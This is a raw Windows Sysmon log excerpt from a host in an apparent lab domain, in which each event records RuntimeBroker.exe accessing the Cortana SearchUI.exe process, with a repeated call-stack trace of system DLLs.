13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.679{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 